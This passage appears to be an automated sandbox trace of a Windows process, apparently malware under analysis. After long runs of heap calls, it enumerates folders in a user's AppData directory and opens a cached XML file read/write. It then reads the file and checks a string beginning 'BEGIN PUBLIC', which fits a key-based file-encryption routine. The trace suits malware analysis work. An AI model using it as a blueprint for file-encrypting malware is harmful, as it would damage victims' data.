(HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.163] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.164] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.164] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.165] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.165] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.166] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.166] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa0) returned 0x3b46320 [0173.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.167] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b4b098 [0173.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.167] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0173.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0173.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0173.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.167] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.168] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.168] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.168] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.168] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.168] PathFindFileNameW (pszPath="") returned="" [0173.168] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.169] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46320 | out: hHeap=0xcd0000) returned 1 [0173.169] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.169] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.169] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.169] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.169] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b46080 | out: hHeap=0xcd0000) returned 1 [0173.169] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.169] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.170] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.170] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.170] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.170] PathFindFileNameW (pszPath="") returned="" [0173.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.173] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35c4580 | out: hHeap=0xcd0000) returned 1 [0173.173] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.173] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0173.173] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57d08 | out: hHeap=0xcd0000) returned 1 [0173.174] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35c44a8 | out: hHeap=0xcd0000) returned 1 [0173.174] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.174] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0173.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0173.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0173.175] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0173.175] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.175] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.175] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.175] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.175] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.175] PathFindFileNameW (pszPath="") returned="" [0173.175] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.175] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360a138 | out: hHeap=0xcd0000) returned 1 [0173.175] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.175] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 1 [0173.176] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0173.176] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0173.176] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=13) returned 1 [0173.176] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0173.180] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.180] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xd, lpOverlapped=0x0) returned 1 [0173.181] lstrlenA (lpString="-----BEGIN PUBLIC 